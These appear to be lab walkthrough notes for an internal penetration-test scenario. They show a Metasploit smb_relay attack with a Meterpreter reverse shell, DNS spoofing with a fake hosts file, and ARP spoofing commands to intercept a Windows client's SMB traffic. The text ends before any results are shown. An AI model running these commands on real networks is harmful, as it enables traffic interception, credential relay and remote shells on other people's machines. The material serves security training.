Links:
https://medium.com/@AnisO./active-directory-attacks-smb-relay-attacks-ea7d8cf9a8f8
How the attack works:
Scenario:
You are hired by a small company to perform a security assessment. Your customer is sportsfoo.com and they want your help to test the security of their environment, according to the scope below: The assumptions of this security engagement are:
You are going to do an internal penetration test, where you will be connected directly into their LAN network 172.16.5.0/24. The scope in this test is only the 172.16.5.0/24 segment
You are in a production network, so you should not lock any user account by guessing their usernames and passwords
The following image represents the LAB environment:
Scenario Goals:
- Exploitation using SMB Relay Attack
- Manipulating network traffic with dnsspoof
Scenario Tasks:
Launch an attack using the SMB Relay Exploit in a way that once the Client (172.16.5.5) issues a SMB connection to any hosts on the _.sportsfoo.com domain it can be redirected to your Metasploit server, and then you can use its credentials to get a shell on the target machine (_172.16.5.10*).
This is a graphic that represents how this attack should work:
Client (Windows 7) issues a SMB connection to
[\\fileserver.sportsfoo.com\finance$]at every 30 seconds or so.The attacker machine intercepts this request and spoofs the IP address of
fileserver.sportsfoo.com.Then the Windows 7 system issues a SMB connection to
[\\172.16.5.101](attacker machine) instead of using the real IP of the fileserver.sportsfoo.com.The SMB Relay exploit is already listening, receives the SMB connection, and relays the authentication to the target machine. The payload is a Windows Meterpreter shell.
Once the exploit authenticates on the target machine, a reverse meterpreter session is provided to the pentester.
Requirements:
- You must be on the same network as the victim(s). This means that if your attacking machine is in a different subnet/broadcast domain, you will be unable to capture the Net-NTLM hash.
- LLMNR must be enabled in the network (enabled by default).
- SMB Signing must be disabled or not required on the target machine. This is the default configuration for most Windows desktop operating systems. Windows Servers will usually have SMB Signing enabled and enforced by default.
- The Net-NTLM hash that you capture must belong to an elevated user on the target machine in order for you to get command execution.
Implementation:
MSF Module:
exploit/windows/smb/smb_relay
Keep the default payload as is.
Use ur Attacking machine as LHOST and SRVHOST
Set SMBHOST to the Target IP: set SMBHOST 172.16.5.10
**Now we want to configure DNS Spoofing to redirect the victim to our Kali machine every time there's an SMB connection to any host in the domain sportsfoo.com **
By creating this fake /etc/hosts file:
echo "172.16.5.101 *.sportsfoo" > dns
This is an entry that can be added to /hosts file to make the victim believe that if he wants to reach to any subdomain of the
sportsfooaccessable by172.16.5.101Our ATTACKING IP MITM
Then spoofing dns with the fake DNS file we just created: use -i with adapter using. And -f for the fake DNS file.
dnsspoof -i eth1 -f dns
MITM attack
We want to Spoof ARP table to make the Client (Win 7
172.16.5.5) PC to believe that we are the Default gateway172.16.5.1or TARGET and make his traffic move through us.
Now we want to enable IP Forwarding:
echo 1 > /proc/sys/net/ipv4/ip_forward
Now we want to perform ARP Spoofing attack on both sides:
First on the Win7 device 172.16.5.5 :
Specify the using adapter..... -t for the target (Win 7 device).... Then the default Gateway
arpspoof -i eth1 -t 172.16.5.5 172.16.5.1
Second on the TARGET device 172.16.5.10 :
Specify the using adapter....... -t for the target ()
aprspoof -i eth1 -t 172.16.5.1 172.16.5.5
Before we start the ARPSPOOF run the MSF Exploit
We can see here that the someone accessed a file INTERESTING!!!!
and if we look back into MSF Module:
